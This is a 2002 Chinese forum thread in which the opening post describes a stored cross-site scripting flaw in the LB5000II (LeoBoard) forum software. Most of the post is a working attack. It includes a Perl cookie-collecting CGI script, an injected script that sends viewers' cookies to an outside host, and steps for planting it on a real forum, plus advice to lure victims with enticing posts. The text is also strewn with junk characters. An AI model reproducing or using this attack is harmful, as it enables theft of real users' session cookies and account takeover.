查看: 9166|回复: 3

雷傲跨站脚本漏洞收集用户cookie漏洞,适合与任何版本,任何系统

[复制链接]
发表于 2002-6-6 11:05:22 |山东| 显示全部楼层 |阅读模式
漏洞描述: # U  M( m. |+ K! B
  LB5000II是国内流行的CGI程序之一,是在Ikonboard的基础之上改进的,目前最新
; `0 J6 f, ?4 Y; D版本是LB5000II v20317b,可以http://www.leoboard.com下载。
1 }# c' o7 [% N  其注册模块未过滤用户资料   最高学历:职业状况:等注册信息 . K* s1 ]: w+ {, |  i; b6 p
导致恶意用户可以通过伪造<s cript>alert(documents.cookie)</s cript>
0 `2 M* Z0 X2 ^" m, l$ j进行攻击,进一步可以通过某中方式收集。测试通过 ; R# \" k. G% v6 g+ B* E
测试程序: ( q( e% z( R: H4 I2 ]+ w
  参考漏洞描述。
, s9 ?6 S" Z/ w解决方案: + _9 o: ^& l- s9 Z2 s$ s
  对用户提交的资料进行过滤 2 _8 P3 Q- |& }4 o5 I
    * v1 b1 }* h7 J  d0 }/ Q6 j

2 {6 S% o) {6 n9 R请在s8s8论坛访问 + V( R$ M" J/ g9 E  W# Y/ M
http://www.leothreads.com/cgi-bin/profile.cgi?action=show&member=大刀队 8 e, A/ B7 r. B) u2 A: M
那么你在s8s8.net 的cookie将被我所获取. , l( o1 M' a  q% I% g
#!/usr/bin/perl , _  a6 ?! K6 o, B) \7 I' h
#leo.cgi
  ~6 n) K1 h; G7 i3 }, d5 i$url="http://www.s8s8.net";;
2 u: v$ B! c0 R4 g$method=$ENV{"REQUEST_METHOD"};
- I$ U- S+ k: g6 ~) T5 qif(lc($method) eq "get"){$buffer=$ENV{"QUERY_STRING"};}
' H9 r! t- {" r. b; _else{read(STDIN,$buffer,length($ENV{"CONTENT_LENGTH"}));} % C+ q9 O6 j5 o: W3 n+ C) T5 S5 H+ I# b: A
$remote_addr=$ENV{"REMOTE_ADDR"};
" f8 q+ c( w+ Y$ v- n$buffer=~tr/+/ /;
- \& C, p8 E8 ~- |3 t$buffer=~s/%([\dA-Fa-f0-9][\dA-Fa-f0-9])/pack("C",hex($1))/eg; ' l: h1 K% z3 ?1 y# F% q- }
$buffer=$buffer."|$remote_addr\n"; ! `4 h" O3 [; w6 z. W- [/ z+ j0 E
open(FILE,">>leo.txt");
4 E9 ^' W0 \' |( A  ~print FILE $buffer; % o5 f1 ~, i- u3 Z* l* g. y6 @
close(FILE);                       
9 F+ W- Y; Y5 e: s; ~print "Location:$url\n\n";
9 Q  p4 T/ b( a2 b, M上面是我的cookie收集脚本   \" W2 N& i5 l7 H
------------------------------------------------------------------------------ 9 ]( x* D  N; @& S! l/ L. r
范例:以s8s8为例,感谢好友狩猎者 shocknet 帮助测试 7 J0 Z! H- l2 H
用大刀队登陆s8s8论坛,编辑个人资料, & o  e0 k9 L( N* R
用记事本打开编辑网页 4 T9 A  @$ M8 @- P7 X
<option value="中专">中专</option>  这一项改成 3 i- e2 V$ C& S# l9 {* E( v
<option value="<s cript>window.open('http://enter.3322.net/cgi-bin/info/leo.cgi?&#39;+documents.cookie)</s cript>">中专</option>   
5 N3 |% p4 }7 D" b; e$ w5 }) e1 z
编辑<FORM action="profile.cgi" method=post name="creator" enctype="multipart/FORM-data"> 5 P. K2 N9 a$ C0 B  t3 n6 q, H
改为 ( Q2 U6 l( O' w8 }" {+ ~; p4 a
<FORM action="http://www.leothreads.com/cgi-bin/profile.cgi"; method=post name="creator" enctype="multipart/FORM-data">
$ e" U$ U4 m1 O* p. @保存编辑的网页,用自己的页登陆,选“中专”一项,提交数据, ! ?# c9 S9 r1 ?+ D' ]
这样以后只要查看大刀队的资料的用户,那么查看者的cookie资料将被截获。 ' H/ W+ `) x$ k6 M1 @$ t
为了伪装的更好,可以在论坛发具有诱惑力的帖子连接,吸引人家去点击, 5 O% a; m1 ?- H/ X! c
什么算诱惑力呢,自己发挥吧。9 w' h; U7 M0 s% P' n8 }. i
发表于 2002-6-8 12:21:09 |广西| 显示全部楼层

雷傲跨站脚本漏洞收集用户cookie漏洞,适合与任何版本,任何系统

我连怎么设置超连接都不懂~~~汗~!能教教我吗?
8 ^2 H8 f* ^  P4 m(我指在贴上设置)
  R% g) P. t( }7 \; U9 ^! D
发表于 2002-6-24 19:03:26 |Invalid| 显示全部楼层

雷傲跨站脚本漏洞收集用户cookie漏洞,适合与任何版本,任何系统

我们的论坛虽然是使用这个程序!但没这个问题!
; ^: C; E# l' S5 u
 楼主| 发表于 2002-6-25 11:25:20 |Invalid| 显示全部楼层

雷傲跨站脚本漏洞收集用户cookie漏洞,适合与任何版本,任何系统

那当染好了啊
您需要登录后才可以回帖 登录 | 注册

本版积分规则

关闭

站长推荐上一条 /1 下一条

相关侵权、举报、投诉及建议等,请发 E-mail:yesdong@qq.com

Powered by Discuz! X5.0 Licensed © 2001-2026 Discuz! Team.44152102000001

在本版发帖QQ客服返回顶部